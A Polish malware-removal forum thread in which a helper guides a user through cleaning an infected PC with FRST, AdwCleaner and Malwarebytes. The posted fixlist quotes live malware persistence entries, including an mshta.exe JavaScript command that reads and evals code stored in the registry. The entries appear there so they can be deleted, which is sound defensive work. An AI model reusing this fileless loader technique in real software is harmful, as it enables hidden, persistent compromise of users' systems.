Pyko Opublikowano 24 Stycznia 2017 Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 Witam Podczas pracy na komputerze Avast raportuje zagrożenie. A konkretnie zarażenie typu URL:Mal. Kilkukrotnie wykonywałem czyszczenie Adwcleaner 6.042 Załączam logi. Addition.txt AdwCleanerC0.txt AdwCleanerC2.txt AdwCleanerS0.txt AdwCleanerS1.txt AdwCleanerS2.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 24 Stycznia 2017 Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 W systemie widoczne aktywne infekcje, zdolne to prowokowania Avasta, aby dawał właśnie takie komunikaty. 1. Przez panel sterowania odinstaluj zbędnik Akamai NetSession Interface. 2. Otwórz Notatnik w nim wklej: CloseProcesses:CreateRestorePoint:HKLM-x32\...\Run: [] => [X]HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Run: [*qguc] => "C:\Users\Pyko\AppData\Local\ebbf8ed\05dc13c.bat" C:\Users\Pyko\AppData\Local\ebbf8edHKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [HideSCAVolume] 0HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2017-01-20] ()GroupPolicy: Ograniczenia - Chrome SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X]S3 cpuz130; Brak ImagePathS3 cpuz138; \??\C:\Users\Pyko\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X]S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]S3 tsusbhub; system32\drivers\tsusbhub.sys [X]S3 VGPU; System32\drivers\rdvgkmd.sys [X]2015-07-28 13:01 - 2015-07-28 13:01 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsj1837.tmp2015-07-28 12:42 - 2015-07-28 12:42 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsm9B15.tmpTask: C:\Windows\Tasks\HBbRNMacN17uyL5.job => C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exeAlternateDataStreams: C:\ProgramData\TEMP:890CC2F3 [127]AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [148]HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\590818e: "C:\Windows\system32\mshta.exe" "javascript:kZo9vd3="H8Bjlqyl";Av4=new ActiveXObject("WScript.Shell");X9mtDuT="ZJMp";CfUA68=Av4.RegRead("HKCU\\software\\bszlfymfbs\\wtsnpduowt");UdftsN5="AUv";eval(CfUA68);qec99S="n1vQ9W";" DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsDeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsHosts:EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W AdwCleaner po skanie, w pasku Opcje zaznacz Reset zasad IE, a następnie kliknij w Oczyść. 4. Przeprowadź pełen skanowanie systemu za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Pyko Opublikowano 24 Stycznia 2017 Autor Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 Ten plik w notatniku zapisać pod jakaś nazwą ? uruchomić przez jakis program ? Odnośnik do komentarza
Miszel03 Opublikowano 24 Stycznia 2017 Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 Zobacz na instrukcję pod skryptem. Odnośnik do komentarza
Pyko Opublikowano 24 Stycznia 2017 Autor Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 Nic nie bylo usuwane, dodaję także raport z Adwcleaner. Pozdrawiam i Dziękuje Addition.txt AdwCleanerC3.txt Fixlog.txt FRST.txt Malwarebytes AntiMalware.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 24 Stycznia 2017 Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 1. Wszystkie wykryte przez MBAM zagrożenia daj do kasacji. 2. Podsumuj obecny stan systemu, czy Avast nadaj krzyczy komunikatami itd. Odnośnik do komentarza
Pyko Opublikowano 24 Stycznia 2017 Autor Zgłoś Udostępnij Opublikowano 24 Stycznia 2017 Brak komunikatu ze strony Avast, wszystko działa jak należy. Dziękuje za pomoc i pozdrawiam Odnośnik do komentarza
Miszel03 Opublikowano 25 Stycznia 2017 Zgłoś Udostępnij Opublikowano 25 Stycznia 2017 W takim razie kończymy. Usuń narzędzia diagnostyczno / dezynfekcyjne (są często aktualizowane, więc jednorazowe) - KLIK. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się